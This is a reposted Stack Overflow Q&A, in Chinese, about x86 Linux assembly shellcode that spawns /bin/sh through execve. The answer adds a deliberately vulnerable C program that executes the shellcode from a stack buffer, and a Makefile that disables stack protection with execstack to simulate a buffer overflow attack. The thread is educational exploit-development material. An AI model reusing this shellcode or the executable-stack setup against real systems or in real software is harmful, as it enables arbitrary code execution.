个人中心
gpt4 book ai didi

linux - 使用 ASM 生成 shell

转载 作者:太空宇宙 更新时间:2023-11-04 09:33:36 25 4
gpt4 key购买 nike

我在 asm 中有以下代码来生成一个 shell - 但它崩溃并给出了 Segmentation Fault。您能否提出可能是什么问题。

jmp short mycall               ; Immediately jump to the call instruction

shellcode:

    pop        esi                ; Store the address of "/bin/sh" in ESI
    xor        eax, eax           ; Zero out EAX
    mov byte   [esi + 7], al      ; Write the null byte at the end of the string

    mov dword  [esi + 8],  esi    ; [ESI+8], i.e. the memory immediately below the string
                                  ;   "/bin/sh", will contain the array pointed to by the
                                  ;   second argument of execve(2); therefore we store in
                                  ;   [ESI+8] the address of the string...
    mov dword  [esi + 12], eax    ; ...and in [ESI+12] the NULL pointer (EAX is 0)
    mov        al,  0xb           ; Store the number of the syscall (11) in EAX
    lea        ebx, [esi]         ; Copy the address of the string in EBX
    lea        ecx, [esi + 8]     ; Second argument to execve(2)
    lea        edx, [esi + 12]    ; Third argument to execve(2) (NULL pointer)
    int        0x80               ; Execute the system call

mycall:

    call       shellcode          ; Push the address of "/bin/sh" onto the stack
    db         "/bin/sh"

最佳答案

您的 shell 代码是正确的。它在尝试以 NULL 终止字符串的指令上发生段错误,因为 .text 部分现在在包括 Linux 在内的所有操作系统上都是只读的。

要成功运行您的代码,您需要使 .text 部分可写或使堆栈或其他一些数据内存可执行。这里我演示了后者来模拟缓冲区溢出攻击:

buggy .c

#include <string.h>
#include "shellcode.h"

int main()
{
    char buf[512];
    memcpy(buf, shellcode_bin, shellcode_bin_len);
    ((void(*)(void))buf)();
    return 0;
}

GNU 生成文件

CFLAGS := -Os -Wall -g3 -I.

NASM_FLAGS := -g -f elf

PROGRAMS := $(basename $(wildcard *.asm *.c))

.PHONY: all clean
all: $(PROGRAMS)
%.o: %.asm
    nasm $(NASM_FLAGS) $< -o $@
clean:
    rm -f $(PROGRAMS) *.o core.* shellcode.bin shellcode.h

.DELETE_ON_ERROR:

shellcode: LDFLAGS := -m32 -nostdlib
shellcode.bin: shellcode
    objcopy --only-section=.text -O binary $< $@

shellcode.h: shellcode.bin
    xxd -i $< > $@

buggy: shellcode.h
buggy: CFLAGS += -m32
buggy: buggy.c
    $(CC) $(CFLAGS) $< $(LDFLAGS) -o $@
    execstack -s $@

构建代码

$ make
nasm -g -f elf shellcode.asm -o shellcode.o
cc -m32 -nostdlib  shellcode.o   -o shellcode
objcopy --only-section=.text -O binary shellcode shellcode.bin
xxd -i shellcode.bin > shellcode.h
cc -Os -Wall -g3 -I. -m32 buggy.c -o buggy
execstack -s buggy
rm shellcode.o

示例 session 

$ ./buggy
sh-4.3$

注意事项

  • execstack -s buggy 在 ELF 二进制文件上设置可执行堆栈标志
  • xxd 程序随 VIM 编辑器一起安装。它位于大多数 Linux 发行版的 vim-common 包中。

关于linux - 使用 ASM 生成 shell,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/28936978/

25 4 0
文章推荐: css - 如何只选择里面有特定内容的表格行
文章推荐: python - 更改 Seaborn 散点图中的图例位置和标签
文章推荐: JavaScript + CSS3 动画无法正常工作?
文章推荐: linux - Perl 库版本 (5.10.1) 与可执行版本 (v5.18.4) 不匹配
太空宇宙
个人简介

我是一名优秀的程序员,十分优秀!

滴滴打车优惠券免费领取
滴滴打车优惠券
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com